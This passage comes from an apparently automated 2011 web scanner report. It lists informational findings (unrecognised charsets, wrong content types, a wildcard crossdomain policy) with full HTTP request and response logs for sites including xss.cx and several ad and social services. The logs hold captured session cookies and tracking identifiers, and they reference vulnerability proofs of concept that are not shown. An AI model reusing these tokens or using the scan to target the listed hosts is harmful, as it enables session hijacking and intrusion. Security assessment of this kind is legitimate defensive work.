<html><head><title>XSS, SQL Injection, Plesk Small Business Manager 10.2.0, Vulnerability Report, Hoyt LLC Research</title>
<meta name="description" content="XSS, Cross Site Scripting in Plesk Small B
...[SNIP]...

15.89. http://xss.cx/examples/html/xss-cross-site-scripting.boardreader.com.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xss.cx
Path:   /examples/html/xss-cross-site-scripting.boardreader.com.html

Request

GET /examples/html/xss-cross-site-scripting.boardreader.com.html HTTP/1.1
Host: xss.cx
Proxy-Connection: keep-alive
Referer: http://xss.cx/examples/html/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vj114q55k5yidj45mjjatj45; whoson=818-1298821388382

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=604800
Content-Type: text/html
Last-Modified: Fri, 04 Feb 2011 15:44:33 GMT
Accept-Ranges: bytes
ETag: "80c6fd6a82c4cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-DORK-Server: xss.cx
Date: Sun, 27 Feb 2011 17:10:52 GMT
Content-Length: 104616

<html><head><title>XSS, Cross Site Scripting, Boardreader.com </title>
   <meta name="description" content="XSS, Cross Site Scripting in Boardreader.com, CWE-79, CAPEC-86">
<meta name="keywords" content
...[SNIP]...

15.90. http://xss.cx/examples/plesk-reports/plesk-10.2.0.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xss.cx
Path:   /examples/plesk-reports/plesk-10.2.0.html

Request

GET /examples/plesk-reports/plesk-10.2.0.html HTTP/1.1
Host: xss.cx
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=818-1298821388382

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=604800
Content-Type: text/html
Last-Modified: Mon, 28 Feb 2011 22:11:20 GMT
Accept-Ranges: bytes
ETag: "0f45a6d94d7cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-DORK-Server: xss.cx
Date: Mon, 28 Feb 2011 22:46:22 GMT
Content-Length: 7972207

<html><head><title>Penetration Testing Plesk Small Business Manager 10.2.0 | Hoyt LLC</title>
<meta name="description" content="Plesk Small Business Manager 10.2.0 Penetration Testing by Hoyt LLC">
<m
...[SNIP]...

15.91. http://xss.cx/examples/plesk-reports/plesk-xss.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xss.cx
Path:   /examples/plesk-reports/plesk-xss.html

Request

GET /examples/plesk-reports/plesk-xss.html HTTP/1.1
Host: xss.cx
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=818-1298821388382

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=604800
Content-Type: text/html
Last-Modified: Mon, 28 Feb 2011 22:19:30 GMT
Accept-Ranges: bytes
ETag: "056b9195d7cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-DORK-Server: xss.cx
Date: Mon, 28 Feb 2011 22:20:23 GMT
Content-Length: 31071

<html><head><title>XSS, SQL Injection, Plesk Small Business Manager 10.2.0, Vulnerability Report, Hoyt LLC Research</title>
<meta name="description" content="XSS, Cross Site Scripting in Plesk Small B
...[SNIP]...

15.92. http://xss.cx/hoyt-llc-research-vulnerability-advisories.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xss.cx
Path:   /hoyt-llc-research-vulnerability-advisories.html

Request

GET /hoyt-llc-research-vulnerability-advisories.html HTTP/1.1
Host: xss.cx
Proxy-Connection: keep-alive
Referer: http://xss.cx/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=818-1298821388382; ASP.NET_SessionId=aujt1145pm2enzarh5ncq545

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=604800
Content-Type: text/html
Last-Modified: Tue, 01 Mar 2011 01:01:25 GMT
Accept-Ranges: bytes
ETag: "8060230acd7cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-DORK-Server: xss.cx
Date: Tue, 01 Mar 2011 01:48:41 GMT
Content-Length: 16950

<html><head><title>Published Vulnerabilities, CVE and Articles by Hoyt LLC Research</title>
   <meta name="description" content="XSS, Cross Site Scripting, Published Vulnerabilities, CVE and Articles by
...[SNIP]...

16. HTML uses unrecognised charset  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.bloganol.com
Path:   /2011/02/domain-short-url-google-apps.html

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Request

GET /2011/02/domain-short-url-google-apps.html?cf_action=sync_comments&post_id=6070 HTTP/1.1
Host: www.bloganol.com
Proxy-Connection: keep-alive
Referer: http://www.bloganol.com/2011/02/domain-short-url-google-apps.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=43; __unam=52e0572-12e67f5b1cd-6a67d63-1; __utmz=84460490.1298824279.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84460490.436433058.1298824277.1298824277.1298824277.1; __utmc=84460490; __utmb=84460490.1.10.1298824277; base_domain_ac2b68f7076cb9985d4ef7c8d1b96442=www.bloganol.com; fbsetting_ac2b68f7076cb9985d4ef7c8d1b96442=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:52 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset="UTF-8"
Content-Length: 17

// sync scheduled

17. Content type incorrectly stated  previous  next
There are 78 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.



17.1. http://a1.twimg.com/profile_images/657503744/twitterProfilePhoto_normal.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.twimg.com
Path:   /profile_images/657503744/twitterProfilePhoto_normal.jpg

Request

GET /profile_images/657503744/twitterProfilePhoto_normal.jpg HTTP/1.1
Host: a1.twimg.com
Proxy-Connection: keep-alive
Referer: http://plancast.com/p/3zbp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=252460800
Date: Tue, 01 Mar 2011 13:46:43 GMT
Content-Length: 5181
Content-Type: image/jpeg
ETag: "927a4712328572378adf0d7cf5282548"
Expires: Wed, 23 Jan 2019 14:05:40 GMT
Last-Modified: Tue, 26 Jan 2010 23:22:05 GMT
Accept-Ranges: bytes
Server: AmazonS3
X-Amz-Cf-Id: 491146c53d10daf3d38ca25d7ce118e6a37943a752570499f17538f18631837693dc4aa32376fb4e,97e3ea4c0d9ea1b9fd27efc0e0b3d770cac587c9fdc44957484103fe254d1d56a10e1a1ab94213d9
x-amz-id-2: /M/NceAkPCjeUE8DWlBjn+jjw+uv3tdlVoEvYsqJJMZdiPzGXhHR5wy6Y0e7pvgr
x-amz-request-id: 578950FB99C8A895
X-Cache: Miss from cloudfront
Connection: keep-alive

.PNG
.
...IHDR...0...0.....W.......gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD.............    pHYs...H...H.F.k>...    vpAg...0...0....W...IDATh.m....W..w.-..*kcQ$E...#
...[SNIP]...

17.2. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Request

GET /ad/js/3992-121072-16279-0?mpt=773835526&mpvc=http://at.atwola.com/adlink/5113/1838224/0/6/AdId=1491683;BnId=1;itime=773835526;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311146;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 499
Date: Sun, 27 Feb 2011 02:30:36 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838224/0/6/AdId=1491683;BnId=1;itime=773835526;kvpg=techcrunch/2011/02/16/forbes-accused-of-link-;kvugc=0;kvmn=93311146;kvtid
...[SNIP]...

17.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773835603&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838229/0/6/AdId=1468660;BnId=1;itime=773835603;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311151;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=; A3=heSmakII0c9M00001hK5JalZa0bfZ00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8z6A0000000001tq8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; expires=Fri, 27-May-2011 21:30:37 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=heSmakII0c9M00001hK5JalZa0bfZ00002hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; expires=Fri, 27-May-2011 21:30:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8z6A0000000002tq8qaI0000000001tn; expires=Fri, 27-May-2011 21:30:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g; expires=Fri, 27-May-2011 21:30:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 27 Feb 2011 02:30:36 GMT
Connection: close
Content-Length: 2191

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

17.4. http://capgeminicom.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://capgeminicom.112.2o7.net
Path:   /crossdomain.xml

Request

GET /crossdomain.xml HTTP/1.1
Host: capgeminicom.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/ext/video_library/swf/player_onsite.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:16 GMT
Server: Omniture DC/2.0.0
xserver: www601
Content-Type: text/html
Content-Length: 167

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

17.5. http://cdn.cloudscan.us/examples/exploits/watchmouse.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.cloudscan.us
Path:   /examples/exploits/watchmouse.txt

Request

GET /examples/exploits/watchmouse.txt HTTP/1.1
Host: cdn.cloudscan.us
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sun, 27 Feb 2011 02:07:30 GMT
Accept-Ranges: bytes
ETag: "fc91cb1623d6cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 02:08:21 GMT
Content-Length: 1484

Hoyt LLC Research
Boston, MA US

Feb 26, 2011

Re: Walk Thru for PoC

Using a Tool such as Burp Suite Pro, ZAPROXY or other HTTP Tool by which to issue a GET

Issue a GET using the following:
...[SNIP]...

17.6. http://cloudscan.us/images/plesk-cover-1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cloudscan.us
Path:   /images/plesk-cover-1.jpg

Request

GET /images/plesk-cover-1.jpg HTTP/1.1
Host: cloudscan.us
Proxy-Connection: keep-alive
Cache-Control: max-age=0
If-Modified-Since: Thu, 10 Feb 2011 18:07:29 GMT
If-None-Match: "1ec23e614dc9cb1:0"
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=108330077.1298820847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=876-1298820851852; __utma=108330077.800258796.1298820847.1298826554.1298905777.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 28 Feb 2011 22:06:07 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

17.7. http://corp.tap11.com/wp-content/themes/tap11/Geogtq-Rg.otf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://corp.tap11.com
Path:   /wp-content/themes/tap11/Geogtq-Rg.otf

Request

GET /wp-content/themes/tap11/Geogtq-Rg.otf HTTP/1.1
Host: corp.tap11.com
Proxy-Connection: keep-alive
Referer: http://corp.tap11.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=24616895.1298985422.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24616895.651104102.1298985422.1298985422.1298985422.1; __utmc=24616895; __utmb=24616895.3.9.1298985576644

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 13:08:08 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
Last-Modified: Wed, 19 Jan 2011 21:19:23 GMT
ETag: "2fb74-ca58-49a39922bccc0"
Accept-Ranges: bytes
Content-Length: 51800
Content-Type: text/plain

OTTO.......@CFF ..v...@x....GPOS!......t..".GSUB...S..?,...JOS/2.Q.....0...`cmap..62...X....head.q.........6hhea    ..+.......$hmtx..])...`...Lkern.Y........    .maxp..P....(....name=R..........post...2....
...[SNIP]...

17.8. http://cotweet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cotweet.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: cotweet.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=191542200.1298985412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=191542200.1813821936.1298985412.1298985412.1298985412.1; __utmc=191542200; __utmb=191542200.1.10.1298985412

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 13:16:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 15 Oct 2010 17:51:29 GMT
ETag: "153445d-57e-492ab79e5aa40"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................d................q..2.......&.......5...........{... ....}......"z......1.......P...............T...&........t..~...........q........
...[SNIP]...

17.9. http://dev.qwerly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dev.qwerly.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: dev.qwerly.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78868500.1298945321.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=60340024.1298947790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60340024.188782387.1298947790.1298947790.1298947790.1; __utmc=60340024; __utmb=60340024.1.10.1298947790; __qca=P0-2075914333-1298947790163; __utma=78868500.1042130367.1298945321.1298945321.1298947759.2; __utmc=78868500; __utmb=78868500.4.10.1298947759

Response

HTTP/1.1 404 Not Found
P3P: policyref="/w3c/p3p.xml",CP="CAO COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT STA"
Content-Length: 9
ETag: "135d4069"
Content-type: text/html
Date: Tue, 01 Mar 2011 02:49:38 GMT
Server: Mashery Proxy

Not found

17.10. http://developer.klout.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://developer.klout.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: developer.klout.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: arrival_cookie=946777d531528b2bf363616794e8adfbf3a48382837f53a4fa6b4e82003a0526974db48ea4f920f48c3b864757984edb3b2affcac264f40be0a749dbeee6dcccaf73dc8a679fa939bfca6210272326684357b4a1eec6cb8fc932d3ed6a0a8f40aa83542a500525ba2c586f0403ca529fbb9359262d905db3103667ed0ff5c3e30599aafa7bfc86e7c0fd20683ba2f913c9065481b6b566c4368205c4dd0bc103eae209d9a08b4a373a6ad539ce16e4df1429504f76b570cf2aabd32c14984f3f7e12072f8ade69a7b5ff2200689db1b7; __qca=P0-1165085945-1298945312517; lcid=6f2ca7b2012e10009755722813cc6926; __unam=c3eadea-12e6f5153b2-24b418a5-1; __utmz=261428178.1298947724.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261428178.452644752.1298947724.1298947724.1298947724.1; __utmc=261428178; __utmb=261428178.2.10.1298947724; __utmz=170572213.1298947744.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=170572213.10405763.1298947744.1298947744.1298947744.1; __utmc=170572213; __utmb=170572213.2.10.1298947744; _chartbeat2=wntukiwjtf1jnkcs

Response

HTTP/1.1 404 Not Found
P3P: policyref="/w3c/p3p.xml",CP="CAO COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT STA"
Content-Length: 9
ETag: "135d4069"
Content-type: text/html
Date: Tue, 01 Mar 2011 02:48:50 GMT
Server: Mashery Proxy

Not found

17.11. http://discuss.zoho.com/getCustomFile.do  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://discuss.zoho.com
Path:   /getCustomFile.do

Request

GET /getCustomFile.do?fileId=28469000000483035&forumGroupId=28469000000003003 HTTP/1.1
Host: discuss.zoho.com
Proxy-Connection: keep-alive
Referer: http://duck.co/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=a95bc164-a3cd-4cf1-9ee6-e1e78d1beee0; Path=/
Pragma: no-cache
Cache-Control: max-age=1296000, must-revalidate
Expires: Wed, 16 Mar 2011 02:59:06 PDT
Set-Cookie: JSESSIONID=46F945359CCCD7322B88FC264873F57D; Path=/
Last-Modified: Tue, 08 Feb 2011 22:22:27 PST
Content-Disposition: inline;filename="8f505875064c8add70076d52115d3234.png"
Content-Type: image/png;charset=UTF-8
Content-Length: 6112
Date: Tue, 01 Mar 2011 01:59:06 GMT
Server: Apache-Coyote/1.1

......JFIF.............C....................................................................C.......................................................................P.P.."..............................
...[SNIP]...

17.12. http://drh.img.digitalriver.com/DRHM/Storefront/Site/winamp/cm/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/Storefront/Site/winamp/cm/images/favicon.ico

Request

GET /DRHM/Storefront/Site/winamp/cm/images/favicon.ico HTTP/1.1
Host: drh.img.digitalriver.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ETag: "47e-47f5e197"
Content-Type: text/plain
Last-Modified: Fri, 04 Apr 2008 08:06:47 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=169;ecid=66744204117,0)
Content-Length: 1150
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app56
Accept-Ranges: bytes
Cache-Control: max-age=129600
Expires: Tue, 01 Mar 2011 05:44:55 GMT
Date: Sun, 27 Feb 2011 17:44:55 GMT
Connection: close

............ .h.......(....... ..... ....................................@.........................................................d...q..........................................................$Px...
...[SNIP]...

17.13. http://duck.co/jsp/i18nConstants.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://duck.co
Path:   /jsp/i18nConstants.jsp

Request

GET /jsp/i18nConstants.jsp?locale=en_US HTTP/1.1
Host: duck.co
Proxy-Connection: keep-alive
Referer: http://duck.co/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
